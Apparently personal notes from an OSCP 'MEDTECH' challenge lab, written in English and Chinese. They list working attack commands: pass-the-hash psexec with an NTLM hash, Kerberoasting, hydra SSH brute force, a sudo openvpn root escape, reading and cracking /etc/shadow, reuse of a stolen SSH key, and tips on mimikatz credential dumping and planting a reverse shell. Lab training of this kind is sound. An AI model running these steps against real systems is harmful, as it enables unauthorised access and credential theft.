proxychains -q impacket-GetUserSPNs -request -dc-ip 172.16.188.10 MEDTECH.com/Administratior (PWD: denZV00Zwtpax57. ) ----> No found.

---> Next, we can also login to PROD01(172.16.x.13) : proxychains -q impacket-psexec -hashes :2e208ad146efda5bc44869025e06544a leon@172.16.188.13

PROD01 (172.16.x.13)

proxychains -q impacket-psexec -hashes :2e208ad146efda5bc44869025e06544a leon@172.16.188.13 --> Login successful

Get-ChildItem -Path C:\Users -Include log,ini,.txt,.pdf,.xls,.xlsx,.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue ---> no useful info except proof.txt

Found there is a 'output.txt' under C:\ ---> no useful info inside.

Brute force attack for 122

Prepare a user list containing all users found so far. For 14: proxychains -q hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh://172.16.188.14 -v ---> No progress..

For 122: hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh://192.168.188.122 ---> found it! offsec:password

ssh offsec@192.168.188.122 --> succeed. but offsec has no root priv and many command are forbidden... Based on the msg below (lshell) - You are in a limited shell. Type '?' or 'help' to get the list of allowed commands

offsec:~$ help cat cd clear echo exit help history ll lpath ls lsudo sudo

offsec:~$ sudo -l [sudo] password for offsec: Matching Defaults entries for offsec on vpn: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User offsec may run the following commands on vpn: (ALL : ALL) /usr/sbin/openvpn

----》 According to ‘https://gtfobins.github.io/gtfobins/openvpn/#sudo’ sudo openvpn --dev null --script-security 2 --up '/bin/sh -c sh' ---》 Get root priv！

ls /home ---> found mario and it's .ssh dir

cat /etc/passwd

mario:x:1001:1001::/home/mario:/bin/sh

cat /etc/shadow mario:$y$j9T$WlF.5NfkOQ2xN4K9OPM2e1$X/wrPHU0zaz.dGUjFQGLj5nbrTfNpy0Hm6Xev04aUw8:19268:0:99999:7::: ----> crack it copy mario info to Kali

┌──(kali㉿kali)-[~/Downloads]
└─$ cat passwd.txt
mario:x:1001:1001::/home/mario:/bin/sh

┌──(kali㉿kali)-[~/Downloads]
└─$ cat shadow.txt
mario:$y$j9T$WlF.5NfkOQ2xN4K9OPM2e1$X/wrPHU0zaz.dGUjFQGLj5nbrTfNpy0Hm6Xev04aUw8:19268:0:99999:7:::

└─$ unshadow passwd.txt shadow.txt > unshadowed.txt                

┌──(kali㉿kali)-[~/Downloads]
└─$ cat unshadowed.txt
mario:$y$j9T$WlF.5NfkOQ2xN4K9OPM2e1$X/wrPHU0zaz.dGUjFQGLj5nbrTfNpy0Hm6Xev04aUw8:1001:1001::/home/mario:/bin/sh

┌──(kali㉿kali)-[~/Downloads]
└─$ john --format=crypt --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

---> FAILED..............

Note: MUST add '--format=crypt' for john command!! Otherwise, john will alert as 'no password hashes loaded (see FAQ)' https://superuser.com/questions/1684358/john-the-ripper-on-kali-linux-it-outputs-no-password-hashes-loaded

cd .ssh ssh -i id_rsa mario@172.16.188.14 ---> login successfully!

172.16.188.14

On 192.168.x.122,

cd /home/mario/.ssh
ssh -i id_rsa mario@172.16.188.14

---> we can found local.txt There is no proof.txt on this host. so we don't need to escalate our priv.

学到的教训

ssh.exe 建立tunnel会失败，此时可以用chisel工具
mimikatz的 sekurlsa::logonpasswords 和 lsadump::sam 可以获得不同的info，都需要执行
使用 Get-ChildItem -Path C:\Users -Include *log*,*ini,*.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue 来搜索info
crackmapexec 除了smb还可以搜索winrm等其他protocol。但是对RDP的搜索结果不准确。
对于RDP的用户/密码的验证，最准确的办法就是手动试（工具验证不出来）
总结获得到的username一览和密码一览，进行Reuse password攻击有时候会有用！

替换C:\TEMP目录下的backup.exek --》reverse shell文件，具体可以被执行 ----》有什么情报能证明这个执行有效？不清楚 ---》解释：

Judging by the name of the binary, we could assume maybe there is a ||scheduled task running|| with the context of high value target (Administrator or NT authority\System user) which our current user won't have visibility to check it out using the ||schtasks|| command. 
However, we can look for running processes using the same name as the binary suggests. ||watch-command ( (https://raw.githubusercontent.com/markwragg/PowerShell-Watch/master/Watch/Public/Watch-Command.ps1)|| would be a great tool for inspecting service footprints.
I hope this explanation makes sense.

必要时要用hydra进行brute force attack试一试

WDavid404 / OSCP

Challege Lab1-MEDTECH #26